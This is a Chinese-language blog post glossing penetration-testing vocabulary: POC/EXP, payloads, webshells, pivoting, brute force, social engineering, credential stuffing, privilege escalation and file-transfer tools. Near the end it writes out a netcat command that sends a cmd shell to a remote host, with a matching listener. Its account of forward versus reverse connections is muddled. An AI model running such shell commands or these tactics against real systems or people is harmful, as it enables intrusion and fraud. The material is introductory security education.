网络安全&系统& *** 作&名词

网络安全&系统& *** 作&名词,第1张

网络安全&系统& *** 作&名词

常见名词

前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒,

反d,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞库,ATT&CK等

POC:全称 ’ Proof of Concept ',中文 ’ 概念验证 ’ ,常指一段漏洞证明的代码。

EXP:全称 ’ Exploit ',中文 ’ 利用 ',指利用系统漏洞进行攻击的动作。

Payload:中文 ’ 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。

Shellcode:简单翻译 ’ shell代码 ',是Payload的一种,由于其建立正向/反向shell而得名。

POC和EXP

是对立面,POC一般是指验证,EXP是指利用

在比赛乃面试中当别人给出了POC代码和EXP代码那么分别就是验证代码和利用代码,

那么在POC和EXP中呢也属于先后行

POC目的是验证漏洞是否存在,而我们的EXP则是利用,在侧重点情况来说,EXP则重

注意点

POC是用来证明漏洞存在的,EXP是用来利用漏洞的,两者通常不是一类,或者说,PoC通常是无害的,Exp通常是有害的,有了POC,才有EXP。

Payload有很多种,它可以是Shellcode,也可以直接是一段系统命令。同一个Payload可以用于多个漏洞,但每个漏洞都有其自己的EXP,也就是说不存在通用的EXP。

Shellcode也有很多种,包括正向的,反向的,甚至meterpreter。

Shellcode与Shellshcok不是一个,Shellshock特指14年发现的Shellshock漏洞。

Payload/shellcode

在我们免杀中,出现频繁,意思指的是漏洞载荷,漏洞代码,利用管道。

在漏洞利用成功后如何讲获得的权限移交给对方

通过哪些协议,【http,tcp,】那么这个传输和基于的过程我们称为payload【利用载荷和利用管道的意思】

后门/Webshell

在我们渗透测试中,当你给一个系统或者一个网站连接的一条对方暂时不会发现的属于你的恶意性的传输等通道或者是会话,这种就是后门,而Webshell他也是后门但他针对的web方面,针对网站这块的,就是说后门属于统称,只要满足他的要求就是属于后门,而Webshell呢,是后门这个代理里面的web方面的后门,如果你给一个网站植入了后门,那么你可以说你给他植入后门,当别人问是什么后门,那么你可以说植入了一个Webshell后门

木马/病毒

虽然说木马和病毒都属于恶意程序,但是两者之间还是有一点区别,

木马主要针对的是系统方面的,控制你电脑,对你的电脑进行什么 *** 作,窃取什么东西,而病毒呢,他本质就是破坏性的,目的就是搞破坏,

反d/回显

反d他的意思就是当你拿到了一个权限,你可以将这个权限移植到其他设备,将他反d过去

跳板

跳板呢就是中介的意思,打个比方,我是A,我想认识C,但是我只认识B,那么我可以通过B去认识C,就是说A通过B以B为跳板去认识到C

在渗透中,当我们获得了对方内外中的电脑,那么我可以通过对方这个电脑为跳板去识别去获取更多的电脑设备情况

包括我们的这个VPN也是一样的

我们将请求发送到服务器,或者是节点,他们以跳板的身份去帮我们搜索这些东西,然后再返回给我们

黑白盒子测试

黑白盒测试可以简单来说,一个是盲打,一个不是

一个有源码一个没有,

黑盒测试呢,就是只给你一个目标,什么都没有

白盒测试呢,网上能找到相关类似的源码,可以通过源码进行分析,从而达到渗透目的

暴力破解

爆破啊,他是常用于密码和账户性的爆破,当你不知道对方账户时可以通过暴力破解,跑字典对方他的用户名称进行拆解

社会工程学

社会工程学呢,简单点说,就是猜你,和套你

那么当我们在攻击渗透方面没有进展的时候,就通过社会工程学来达到目的

什么猜你

首先通过通过人肉搜索去找到你的名字生日星座喜欢的验证这写简单的信息

去通过工具和脚本不断的组合密码和用户

去尝试登录一些常见的APP或者网站

那么套你呢,纯属就是诈骗,一个抠脚大汉黑客搞了一个微信名称改成女孩子的头像改成女孩子的,去加你,和你聊天,一开始问你叫什么啊,你多大拉,家住哪里啊,等等信息,一个漂亮的女孩子怎么主动怎么问这谁顶的住啊,那么对方就可以套你的一些话,将套到的话进行分析从而获取你更多的信息,

撞库

撞库就是网上泄露出来的一些数据库,那么这些数据库中有真实明显和密码等,那么可以通过对数据库的收集查询,去查询有没有这个人,看看他以前设置过什么密码,看看他这个密码到底是什么含义,然后我们再尝试去其他每天以他账户去和密码登录看有没有能成功的

ATT参考

https://attack.mitre.org/matrices/enterprise/

*** 作系统-用途&命令&权限&用户&防火墙 个人计算机&服务器用机

个人计算机能主要是以win10和win7现在出现了win11,那么个人计算机主要是解决自己的日常问题

那么服务器用机目前流行的是linux系统,Windows2008系统,windows2012,window是2016还要乌班图系统,那么现在虽然也出了Windows2019还要很久前的2003为什么没有用这些系统

很大原因是2003太老了,没有window2012 *** 作方便快捷明了,Windows2019其实和Windows2012和16差不多的,也因为Windows2019实战有点年轻了

服务器他存放的是个人或者公司非常重要的东西,如果被人打进去了那就损失惨重了,就好比目前的win11,刚发现没多久网上就有漏洞公布了,这还是只是已经公布的,背地没有公布的呢那就不知道了

Windows&Linux常见命令

https://blog.csdn.net/wsnbbz/article/details/103304217

https://blog.csdn.net/weixin_43303273/article/details/83029138

文件权限&服务权限&用户权限等

在权限方面渗透中,有一个叫提权,那么为什么要提权,™的我已经黑经这个用户了黑进去他服务器了,干嘛还要提权呢

首先我们系统中有普通用户系统用户管理员还要来宾用户等等,

很多情况下一家公司服务器由几个人进行管理,有负责运维的,有负责搭建的,有负责安全的,每个人都有一个用户,每个他权限都不一样

那么当你获取到其他在一个用户,他的权限不能满足你目前的需求的那么就需要通过提权的手段来获得更高权限

系统用户&用户组&服务用户等分类

https://www.runoob.com/linux/linux-user-manage.html

https://www.cnblogs.com/lip-blog/p/7658839.html

自带防火墙出站&入站规则策略协议

在防火墙策略中,有出战和入站两种策略

出战,简而言之就是出去,

入站,就是别人进来

一般防火墙对出去基本没有什么检测等现在,但是当别人要进来那就必须麻烦了,就难咯

但是也不是所有的都这样,我们的80端口http协议通道他就默认都可以进来,那么这就是导致我们web在防火墙防御用到的不大

但是针对内外系统上防御就比较强了

文件上传下载&数据传输

Linux:wget curl python ruby perl java等

Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等

https://blog.csdn.net/u012910342/article/details/116278306

https://www.cnblogs.com/pretty-ru/p/10936023.html

正反向连接

正向是你找别人,主动去连接,反向是别人找你

nc -e cmd 服务器ip 5566

那么这个就是正向连接

什么意思呢

就是将我们电脑的cmd *** 作发送给服务器 5566端口于服务器进行会话连接

此时我的服务器就监听5566端口了

nc -lvvp 5566

由我的电脑去主动找服务器会话是正向连接

是能成功的

反过来及不能了

这就涉及到根本问题

就是ip问题

同不同级问题

服务器他的ip属于公网ip

那么我的ip属于net内网ip

那么内网要出去都要进过一个出口,出口也属于公网ip和服务器同级,他们可以正常对话,但是我们内网和公网不是同级,只能我们找他,他找不到我

欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/langs/870866.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-13
下一篇 2022-05-13

发表评论

登录后才能评论

评论列表(0条)

保存